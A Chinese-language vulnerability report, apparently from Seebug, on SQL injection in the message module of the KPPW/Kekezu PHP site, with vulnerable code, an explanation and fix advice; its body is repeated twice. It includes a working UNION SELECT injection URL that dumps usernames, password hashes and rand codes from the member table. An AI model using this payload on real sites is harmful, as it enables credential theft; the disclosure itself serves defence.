### 简要描述: `msg_id` 参数未经过滤直接拼接进 SQL，导致 SQL 注入（可读取会员表中的用户名与密码散列）。

### 详细说明:

文件路径 /control/user/message_outbox.php

```php
switch ($action) {
    case 'mulitDel' :
        if (is_array($ckb)) {
            foreach ( $ckb as $v ) {
                list ( $intMsgId, $intStatus ) = explode ( ',', $v );
                if ($intStatus == 0) {
                    db_factory::execute ( "update " . TABLEPRE . "witkey_msg set msg_status=1 where msg_id = $intMsgId" );
                } else {
                    $objMsgT->del ( 'msg_id', $intMsgId );
                }
            }
            kekezu::show_msg ( '删除成功', $strUrl, NULL, NULL, 'ok' );
        } else {
            kekezu::show_msg ( '删除失败', NULL, NULL, NULL, 'error' );
        }
        break;
```

`$intMsgId` 由用户提交的 `$ckb` 数组逐项 `explode(',', ...)` 得到，既没有 `intval()` 强制转换，也没有使用参数化查询，就被直接拼进 `update ... where msg_id = $intMsgId`，因此 `msg_id` 带入查询产生注入。另一分支 `$objMsgT->del('msg_id', $intMsgId)` 传入的是同一个未过滤的值，其内部是否转义需另行确认。此外，该 UPDATE 语句只以 `msg_id` 作为条件，不像下文的查询那样带有 `uid` 限制；若在此之前没有校验消息归属，任何登录用户都可能按 ID 修改或删除他人的消息（越权），建议一并核实。

注意：下面的复现针对的是同一文件中 `op=detail` 分支的 `msgId` 参数（对应的是一条 SELECT 语句），并非上面贴出的 `mulitDel` 分支；两处的问题模式相同——用户输入未经过滤直接拼接进 SQL。

mysql 实际执行的语句为

```sql
select * from keke_witkey_msg where msg_id<6 and 1=1 and msg_status<>1 and uid = 5529 order by msg_id desc limit 0,1
```

构造的注入 URL（`--` 注释掉后面的条件，通过 union select 读出 `keke_witkey_member` 表中的 username、password、rand_code）：

```
http://127.0.0.1/1/index.php?do=user&view=message&op=detail&msgId=6 union select 1,2,3,4,5,6,7,8,concat(username,0x3a,password,0x3a,rand_code),10,11 from keke_witkey_member--&type=outbox&intPage=1
```

修复建议：对 `msg_id` / `msgId` 做 `intval()` 强制转换，或改用预处理语句绑定参数；同时在更新/删除前校验消息的 `uid` 属于当前登录用户。

![12222.jpg](https://images.seebug.org/upload/201406/26113156d2a3cd1f6c6fac367dbc85aa36e3de1c.jpg)
### 简要描述: `msg_id` 参数未经过滤直接拼接进 SQL，导致 SQL 注入（可读取会员表中的用户名与密码散列）。

### 详细说明:

文件路径 /control/user/message_outbox.php

```php
switch ($action) {
    case 'mulitDel' :
        if (is_array($ckb)) {
            foreach ( $ckb as $v ) {
                list ( $intMsgId, $intStatus ) = explode ( ',', $v );
                if ($intStatus == 0) {
                    db_factory::execute ( "update " . TABLEPRE . "witkey_msg set msg_status=1 where msg_id = $intMsgId" );
                } else {
                    $objMsgT->del ( 'msg_id', $intMsgId );
                }
            }
            kekezu::show_msg ( '删除成功', $strUrl, NULL, NULL, 'ok' );
        } else {
            kekezu::show_msg ( '删除失败', NULL, NULL, NULL, 'error' );
        }
        break;
```

`$intMsgId` 由用户提交的 `$ckb` 数组逐项 `explode(',', ...)` 得到，既没有 `intval()` 强制转换，也没有使用参数化查询，就被直接拼进 `update ... where msg_id = $intMsgId`，因此 `msg_id` 带入查询产生注入。另一分支 `$objMsgT->del('msg_id', $intMsgId)` 传入的是同一个未过滤的值，其内部是否转义需另行确认。此外，该 UPDATE 语句只以 `msg_id` 作为条件，不像下文的查询那样带有 `uid` 限制；若在此之前没有校验消息归属，任何登录用户都可能按 ID 修改或删除他人的消息（越权），建议一并核实。

注意：下面的复现针对的是同一文件中 `op=detail` 分支的 `msgId` 参数（对应的是一条 SELECT 语句），并非上面贴出的 `mulitDel` 分支；两处的问题模式相同——用户输入未经过滤直接拼接进 SQL。

mysql 实际执行的语句为

```sql
select * from keke_witkey_msg where msg_id<6 and 1=1 and msg_status<>1 and uid = 5529 order by msg_id desc limit 0,1
```

构造的注入 URL（`--` 注释掉后面的条件，通过 union select 读出 `keke_witkey_member` 表中的 username、password、rand_code）：

```
http://127.0.0.1/1/index.php?do=user&view=message&op=detail&msgId=6 union select 1,2,3,4,5,6,7,8,concat(username,0x3a,password,0x3a,rand_code),10,11 from keke_witkey_member--&type=outbox&intPage=1
```

修复建议：对 `msg_id` / `msgId` 做 `intval()` 强制转换，或改用预处理语句绑定参数；同时在更新/删除前校验消息的 `uid` 属于当前登录用户。

![12222.jpg](https://images.seebug.org/upload/201406/26113156d2a3cd1f6c6fac367dbc85aa36e3de1c.jpg)

### 漏洞证明:

![12222.jpg](https://images.seebug.org/upload/201406/26113156d2a3cd1f6c6fac367dbc85aa36e3de1c.jpg)